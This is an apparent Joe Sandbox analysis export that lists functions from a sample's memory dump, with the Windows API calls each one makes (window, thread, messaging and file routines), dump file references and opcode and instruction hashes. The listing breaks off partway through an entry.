                                                                                                                                                                                                                                                                                                                            Function 002680AE Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • ClientToScreen.USER32(?,?), ref: 002680D4
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 0026814A
                                                                                                                                                                                                                                                                                                                            • PtInRect.USER32(?,?,?), ref: 0026815A
                                                                                                                                                                                                                                                                                                                            • MessageBeep.USER32(00000000), ref: 002681C6
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1352109105-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 6fc8796970a973dc87221e98108a2a93a1a25a1865d6c73dcdbff0442f1d5712
                                                                                                                                                                                                                                                                                                                            • Instruction ID: cb3069c372b0c16e2084c607acd2a9757c2aac946ca2d539d82036b7b6d04cc2
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6fc8796970a973dc87221e98108a2a93a1a25a1865d6c73dcdbff0442f1d5712
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F841C230A10216DFCB11CF58D884AA977F5FF4A714F1442E8EA599B261CB74E996CF40
                                                                                                                                                                                                                                                                                                                            Function 00262176 Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 00262187
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00234393: GetWindowThreadProcessId.USER32(?,00000000), ref: 002343AD
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00234393: GetCurrentThreadId.KERNEL32 ref: 002343B4
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00234393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00232F00), ref: 002343BB
                                                                                                                                                                                                                                                                                                                            • GetCaretPos.USER32(?), ref: 0026219B
                                                                                                                                                                                                                                                                                                                            • ClientToScreen.USER32(00000000,?), ref: 002621E8
                                                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 002621EE
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2759813231-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 90d7f69bf89296ba6ebd388f7ad41d515638523af83d9c72b8145c0ee0fc1f98
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 38c9d99b09430710d258242e7c234cea4188765116fb487c7daac7ddd0830fd0
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 90d7f69bf89296ba6ebd388f7ad41d515638523af83d9c72b8145c0ee0fc1f98
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C3152B1E10509AFCB04EFA5C885DAEB7F8EF58304B5084AAE415E7311DB71DE45CBA0
                                                                                                                                                                                                                                                                                                                            Function 0023E8AC Relevance: 6.1, APIs: 4, Instructions: 87COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D41EA: _wcslen.LIBCMT ref: 001D41EF
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0023E8E2
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0023E8F9
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0023E924
                                                                                                                                                                                                                                                                                                                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0023E92F
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$ExtentPoint32Text
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3763101759-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: e1a80026cd1535f0cc93ca4014e7057e1b57ba346721c63dc8f12e8cfd98be42
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 619d2ac5c65f7b8e854e09d41bc75ca437e2233cc210ccd17dca497d049fe43a
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e1a80026cd1535f0cc93ca4014e7057e1b57ba346721c63dc8f12e8cfd98be42
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F721E2B1D00219AFCB10AFA4D982BBEB7F8EF55350F1540A5E904BB281D7709E55CBA1
                                                                                                                                                                                                                                                                                                                            Function 0023DB6C Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,0026DC30), ref: 0023DBA6
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0023DBB5
                                                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 0023DBC4
                                                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0026DC30), ref: 0023DC21
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2267087916-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 9f9b70e8c8c31a7b73293d38b173f0bfcd87ab15c993c52c7a6b1f2ec9d86e91
                                                                                                                                                                                                                                                                                                                            • Instruction ID: c9f69c8784571b36364043c47ef6de54554f0c0082556d42d8337f94d847947f
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f9b70e8c8c31a7b73293d38b173f0bfcd87ab15c993c52c7a6b1f2ec9d86e91
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E21B5B16283059FC700DF28E88495BB7E8EE5A764F104A1FF499C32A1D771D95ACB42
                                                                                                                                                                                                                                                                                                                            Function 0026321E Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 002632A6
                                                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002632C0
                                                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EC,00000000), ref: 002632CE
                                                                                                                                                                                                                                                                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 002632DC
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$Long$AttributesLayered
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2169480361-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 48a312c6291d24212ba10ba62936eabbbab5a1d72a09ae486142f74db09313ad
                                                                                                                                                                                                                                                                                                                            • Instruction ID: b4431504ad08ecd54e1c109801a0600514d09612fd06b68c345375c0f5b77e9e
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 48a312c6291d24212ba10ba62936eabbbab5a1d72a09ae486142f74db09313ad
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2021B031614112AFD714DF24CC65F6ABB99AF95324F248258F8268B2D2C771ED81CBD0
                                                                                                                                                                                                                                                                                                                            Function 0023825C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002396E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00238271,?,000000FF,?,002390BB,00000000,?,0000001C,?,?), ref: 002396F3
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002396E4: lstrcpyW.KERNEL32(00000000,?,?,00238271,?,000000FF,?,002390BB,00000000,?,0000001C,?,?,00000000), ref: 00239719
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 002396E4: lstrcmpiW.KERNEL32(00000000,?,00238271,?,000000FF,?,002390BB,00000000,?,0000001C,?,?), ref: 0023974A
                                                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,002390BB,00000000,?,0000001C,?,?,00000000), ref: 0023828A
                                                                                                                                                                                                                                                                                                                            • lstrcpyW.KERNEL32(00000000,?,?,002390BB,00000000,?,0000001C,?,?,00000000), ref: 002382B0
                                                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,002390BB,00000000,?,0000001C,?,?,00000000), ref: 002382EB
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                                                                                                                                                            • String ID: cdecl
                                                                                                                                                                                                                                                                                                                            • API String ID: 4031866154-3896280584
                                                                                                                                                                                                                                                                                                                            • Opcode ID: b07622f8e231f402f841dc69332f50f06ea9230bc9ae48270d9a76db1c4ede57
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 7be157e488bc755ed8491e1e5fc729eb71a03cd3fb5946603d3dac2a562473c6
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b07622f8e231f402f841dc69332f50f06ea9230bc9ae48270d9a76db1c4ede57
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 301103BA610346ABCB159F38DC45E7A77A9FF49B50F10802AF906CB250EF71D821C790
                                                                                                                                                                                                                                                                                                                            Function 002660FF Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001060,?,00000004), ref: 0026615A
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0026616C
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00266177
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 002662B5
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 455545452-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 892319a9c40683ebd7b6cb767777da3869b2d9408fbd5025bbfc49a177914f4b
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 3b1867b1f884347878ae3dee5d0f68496a131facde4ab527a260dd558083b995
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 892319a9c40683ebd7b6cb767777da3869b2d9408fbd5025bbfc49a177914f4b
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA11E935A20219A7DB10DF649C88EEF777CEF12754F10416BFA15D5181EBB4C9A4CBA0
                                                                                                                                                                                                                                                                                                                            Function 00202079 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 062c700b204355cf70a995edc83971574b7eec6297ee3ebb2896c0ec09a8195a
                                                                                                                                                                                                                                                                                                                            • Instruction ID: df95b084a65c15ac417e36239c41311e23d606d06f9b632141600469d559af86
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 062c700b204355cf70a995edc83971574b7eec6297ee3ebb2896c0ec09a8195a
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF0184B2635317BEFB212A787CC8F27660EDF61378B344327B521A11D3DEA08C649560
                                                                                                                                                                                                                                                                                                                            Function 00232374 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00232394
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002323A6
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002323BC
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002323D7
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: d5ceb5949aeb6963b8a568e5f6b55d41a8ce758a985d0f35691487cf7c341948
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 594214875dda7f08b8701ae5f2e5ea31d5600257218f7d4d0ec8390be8e55e0c
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d5ceb5949aeb6963b8a568e5f6b55d41a8ce758a985d0f35691487cf7c341948
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA11097AD00229FFEB119BA5CD85F9DFB78FB08750F200091EA01B7290D6716E54DB94
                                                                                                                                                                                                                                                                                                                            Function 0023EAED Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0023EB14
                                                                                                                                                                                                                                                                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 0023EB47
                                                                                                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0023EB5D
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0023EB64
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2880819207-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 9fefa8829293f2616e7a86b126c8d48e31e5bef9ad696a59a1e886b235e5fa2f
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 6fc04ac3b25af04360804f8f379bbf2f375ace01551765b4cf6b8885b63ec8a2
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9fefa8829293f2616e7a86b126c8d48e31e5bef9ad696a59a1e886b235e5fa2f
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 15110CB5900259BBCF019F6CAC09A9A7F6DAB47314F118255F815E32D0D6B4C9084760
                                                                                                                                                                                                                                                                                                                            Function 001FD53C Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,?,001FD369,00000000,00000004,00000000), ref: 001FD588
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 001FD594
                                                                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 001FD59B
                                                                                                                                                                                                                                                                                                                            • ResumeThread.KERNEL32(00000000), ref: 001FD5B9
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 173952441-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: ac92771ba7740c4ea9261f7de5296163aea52e7b408ed85a584bea15fb9e91f1
                                                                                                                                                                                                                                                                                                                            • Instruction ID: f6b78b55be76d463184663b25d2ce3f0b61bd1b1483db1d343ce6d530f6b68ca
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ac92771ba7740c4ea9261f7de5296163aea52e7b408ed85a584bea15fb9e91f1
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F301D67250021CBBCB116FA5FC09BBA7B6AEF81734F104259FA25861E0CBB08801C6A1
                                                                                                                                                                                                                                                                                                                            Function 001D7873 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
